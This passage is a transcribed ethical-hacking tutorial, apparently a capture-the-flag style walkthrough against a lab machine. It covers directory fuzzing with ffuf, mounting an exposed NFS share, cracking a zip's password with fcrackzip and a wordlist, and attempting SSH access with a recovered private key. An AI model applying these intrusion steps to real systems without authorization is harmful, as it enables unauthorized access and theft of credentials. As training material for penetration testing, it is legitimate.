information disclosure in here that could tell us what the setup is of this PHP page. And that could tell us like, hey, maybe there's file inclusion, maybe there's uploading allowed, different attacks that might be enabled because of a setting that is configured or misconfigured in this PHP myinfo type page, or PHP info page. So we have two pages here that are, I mean, there's nothing really there. It's just like, hey, PHP info, Bolt, installation error. So we kind of want to look under the hood. This is just common tactic here that we're going to open up a new tab. I'm going to open up two of them. And we're really just going to enumerate this a little bit further. I just want to see how far we can take this. If it is what it is, like port 80 is literally just a Bolt installation error page, that's fine. But we need to confirm that. So we're going to use FFuff, whatever you want to call it. And we're going to do a quick scan on this. And we're going to do a user share wordless. And then I go to Dirbuster. And just like before, you can just tab. And I use the medium word list. I put a colon. I don't know how to, if you know the trick of getting it to line up immediately after, let me know. Otherwise, just go delete that one space. We can fuzz here. And then we could do a URL of HTTP 192.168.138.137 for this machine /fuzz. Now, before you hit enter, go ahead and copy this. It'll make life easier. Hit enter. Let that bad boy run. Come in here, paste again. And all we're going to do on this one is we're going to put 8080 at the end of it. So we're going to fuzz against 8080 and port 80. And we're going to let these run a little bit. Okay, so we'll let these run, perhaps finish, see if we can get anything of interest out here. While they're running, we can multitask. This is part of the process, by the way. As an ethical hacker or hacker in general, multitasking is important because if you're on an engagement like a pen test, you're going to be doing a lot of things at once. Because imagine a situation where you have 1,000 IP addresses and you have a week to go against them. If you only have a week to do 1,000 IP addresses, you're talking like a few minutes per IP address to look at. So you really have to identify and scan for low-hanging fruit, figure out which IP addresses are the most advantageous, go touch on those more, and perhaps be spending a couple minutes on each at the same time while you're doing this. So it's advantageous to look at multiple things, have scans running, and be bouncing back and forth from an ethical hacking perspective, and you pick up the ability to multitask over time. So anyway, we have this NFS, this network file share, and I'm curious if there's anything there. So what we can do, I'm going to go ahead and just open up a new tab, make this a little bit bigger. What we can do is we can say show mount. This is a command already built into your machine. If you're familiar with Linux, you probably know this. Put an E there. We're just going to list out the directory that's here, the mounted file share. Hopefully that there's one. Okay, and we're exporting from here this. Okay, this is the file share that's offered up. So we've got, looks like server NFS, network file share. So what we're going to do with this is we're going to go ahead and utilize this to our advantage. We're going to mount and see what we can see in this share. So in order to do that, we need to make a directory to mount to. So I'm just going to make a directory called mount, MNT. We have an MNT folder by default. And then I'm just going to call this dev since that's the name of the machine. All right, and then we're going to mount this. So we're going to say mount tact NFS. So this is the type, it's NFS. And we're going to say 192.168.138.137. And then we're going to do server NFS. Okay, so we're calling out on this machine is this server NFS or SRV NFS. And then we're going to put it in mount dev, just like that. All right, so now we can go cd into mount dev ls, and you can see that there is a file in there. That file is called save.zip. So I'm going to go ahead and try to unzip that. And it says, hey, we need a password to unzip this ID RSA file. I have no idea what the password is, so looks like there's an ID RSA in here and a todo.txt, and we don't have the password for either of these. Now, there's a possibility that we go online, we look through some of these folders, maybe something comes back, there's a password in there, that's the path to go. The other thing that we can do is see if we can crack this very quickly. If we can crack it, then maybe we can get in there. And there's a tool out there called fcrackzip. So we can do something called like apt install fcrackzip, just like this. And I've already got it installed, but you should not. It doesn't come by default. Okay, go ahead, let that install. Should only take a second, and then come back. And now we're going to do fcrackzip, just like that. Yours might not auto tab. You might just have to type it out. That's okay. -V for verbose. We want to have verbosity here. See all the output. -U just means we're going to be unzipping. So we're going to unzip the files here. And a -D means we're going to be using a dictionary attack. And a -P means we're going to be using a file in order to attack. So the dictionary attack we're using is the user share wordless, and then we're going to use rocku. Okay. And on this other part, for the -P, we're going to go ahead and use this save.zip. So we're using a string here as the initial password file, which is what we're doing. If we didn't have this here, it would just start attacking via the files inside. So we're calling out specifically, and then here we're saying we're using a word list. Here's the word list we're using. So I'm going to go ahead and run that, hit enter. Okay, and you can see that we have found password is equal to Java 101. So now if we go to unzip save.zip, type in Java 101, hit enter. Okay, we ls, they should be here now. So let's cat out the todo.txt. It says figure out how to install the main website properly. The config file seems correct. Update development website, keep coding in Java because it's awesome. And then we get a signature from JP. We don't know who JP is, but we do get an ID RSA file. So that ID RSA file can be used in order to connect via SSH. Now, we don't know who the user is. There's a chance that the user might be JP, so we can do something like SSH-I I'm not sure if the permission settings here are going to be correct in this ID RSA file. We'll see here in a quick second. And then we come in here and we say something like JP at 192.168.138.137. Cross your fingers, type yes. It asks for his password. We don't know a password. So we're not even sure if that's working. We're not sure. It didn't even look like it took the ID RSA. So we're not sure if this guy's even a user. So let's keep this information in our back pocket for now. We have this, we're going to clear screen. We have this ID RSA file, and we have some information hopefully sitting